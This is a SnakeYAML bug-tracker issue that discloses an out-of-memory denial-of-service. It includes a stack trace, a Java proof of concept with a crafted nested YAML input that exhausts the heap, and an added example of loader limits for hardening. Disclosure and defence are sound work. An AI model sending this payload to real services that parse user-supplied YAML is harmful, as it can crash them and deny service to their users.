- changed status to open
OutOfMemoryError when parsing yaml data
Issue #1064
resolved
Description
Those using SnakeYAML to parse untrusted YAML data may be vulnerable to Denial of Service (DoS) attacks. If the parser is running on user-supplied input, an attacker may supply content that causes the parser to crash with an out-of-memory error. This effect may support a denial of service attack.
Error Log
Exception in thread "main" java.lang.OutOfMemoryError: Java heap space
    at java.util.Arrays.copyOf(Arrays.java:3332)
    at java.lang.AbstractStringBuilder.ensureCapacityInternal(AbstractStringBuilder.java:124)
    at java.lang.AbstractStringBuilder.append(AbstractStringBuilder.java:448)
    at java.lang.StringBuilder.append(StringBuilder.java:142)
    at org.yaml.snakeyaml.nodes.MappingNode.toString(MappingNode.java:93)
    at java.lang.String.valueOf(String.java:2994)
    at java.lang.StringBuilder.append(StringBuilder.java:137)
    at java.util.AbstractCollection.toString(AbstractCollection.java:462)
    at java.lang.String.valueOf(String.java:2994)
    at java.lang.StringBuilder.append(StringBuilder.java:137)
    at org.yaml.snakeyaml.nodes.SequenceNode.toString(SequenceNode.java:65)
    at java.lang.String.valueOf(String.java:2994)
    at java.lang.StringBuilder.append(StringBuilder.java:137)
    at java.util.AbstractCollection.toString(AbstractCollection.java:462)
    at java.lang.String.valueOf(String.java:2994)
    at java.lang.StringBuilder.append(StringBuilder.java:137)
    at org.yaml.snakeyaml.nodes.SequenceNode.toString(SequenceNode.java:65)
    at java.lang.String.valueOf(String.java:2994)
    at java.lang.StringBuilder.append(StringBuilder.java:137)
    at org.yaml.snakeyaml.nodes.MappingNode.toString(MappingNode.java:82)
    at java.lang.String.valueOf(String.java:2994)
    at java.lang.StringBuilder.append(StringBuilder.java:137)
    at java.util.AbstractCollection.toString(AbstractCollection.java:462)
    at java.lang.String.valueOf(String.java:2994)
    at java.lang.StringBuilder.append(StringBuilder.java:137)
    at org.yaml.snakeyaml.nodes.SequenceNode.toString(SequenceNode.java:65)
    at java.lang.String.valueOf(String.java:2994)
    at java.lang.StringBuilder.append(StringBuilder.java:137)
    at java.util.AbstractCollection.toString(AbstractCollection.java:462)
    at java.lang.String.valueOf(String.java:2994)
    at java.lang.StringBuilder.append(StringBuilder.java:137)
    at org.yaml.snakeyaml.nodes.SequenceNode.toString(SequenceNode.java:65)
PoC
// Poc.java
import org.yaml.snakeyaml.Yaml;
import java.io.ByteArrayInputStream;
import java.io.InputStream;
import java.io.InputStreamReader;

/**
 * Poc
 *
 * @since 1.0.0
 */
public class Poc {
    public static void test(String data) {
        String datastring = data;
        try (InputStream datastream = new ByteArrayInputStream(datastring.getBytes());
             InputStreamReader reader = new InputStreamReader(datastream, "UTF-8")) {
            // Default Yaml instance: no custom LoaderOptions are applied.
            Yaml yaml = new Yaml();
            yaml.loadAs(reader, String.class);
        } catch (Exception e) {
            // Exceptions are swallowed here; OutOfMemoryError is an Error,
            // not an Exception, so it is not caught and reaches the caller.
        }
    }

    public static void main(String[] args) {
        test(" ? - - ? - - ? ? - - ? ? ? - - ? ? - - ? ? ? - - ? ? - ? ? - - ? - - ? ? ? - - ? ? - ? -? - ? ? - - ? - - ? ? ? - - ? ? - ? -? - ? ? - - ? - ");
    }
}
References
Comments (4)
- marked as minor
- assigned issue to
- Feel free to review
- changed status to resolved
It will be delivered in version 2.1
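For services that parse user-supplied YAML, the loader can be given explicit bounds instead of the default `new Yaml()` used in the PoC. The following is an added example, not code from the reporter or the SnakeYAML project; it assumes SnakeYAML 2.x and Java 11+, and the class name `BoundedYamlLoader`, the limit values and the sample inputs are constructed for illustration. These limits are general hardening and are not confirmed to stop the input in this report, which the comments above say is fixed in version 2.1.

```java
import org.yaml.snakeyaml.LoaderOptions;
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.SafeConstructor;
import org.yaml.snakeyaml.error.YAMLException;

import java.util.Optional;

/** Added example: bounded loading of untrusted YAML (names and limits are assumptions). */
public class BoundedYamlLoader {
    // Constructed limits for a small config-style document; tune per application.
    private static final int MAX_CODE_POINTS = 16 * 1024;
    private static final int MAX_NESTING_DEPTH = 10;
    private static final int MAX_ALIASES = 5;

    // Yaml instances are not thread-safe, so build one per call.
    private static Yaml newBoundedYaml() {
        LoaderOptions options = new LoaderOptions();
        options.setCodePointLimit(MAX_CODE_POINTS);        // cap on document size
        options.setNestingDepthLimit(MAX_NESTING_DEPTH);   // cap on collection nesting
        options.setMaxAliasesForCollections(MAX_ALIASES);  // cap on alias expansion
        options.setAllowRecursiveKeys(false);
        options.setAllowDuplicateKeys(false);
        // SafeConstructor only builds standard Java types (maps, lists, scalars).
        return new Yaml(new SafeConstructor(options));
    }

    public static Optional<Object> load(String untrusted) {
        // Cheap pre-check before any parser state is allocated.
        if (untrusted == null || untrusted.length() > MAX_CODE_POINTS) {
            return Optional.empty();
        }
        try {
            return Optional.ofNullable(newBoundedYaml().load(untrusted));
        } catch (YAMLException e) {
            // Limit violations and syntax errors arrive as YAMLException.
            // An OutOfMemoryError would not be caught by this handler.
            System.err.println("rejected: " + e.getClass().getSimpleName());
            return Optional.empty();
        }
    }

    public static void main(String[] args) {
        String ok = "name: demo\nports:\n  - 80\n  - 443\n"; // constructed sample
        String deep = "- ".repeat(40) + "x\n";                // constructed: 40 nested sequences
        System.out.println("ok accepted:   " + load(ok).isPresent());
        System.out.println("deep accepted: " + load(deep).isPresent());
    }
}
```

Because an `OutOfMemoryError` bypasses `catch (Exception e)`, as the PoC's own stack trace shows, these limits reduce exposure but do not replace upgrading to the fixed release.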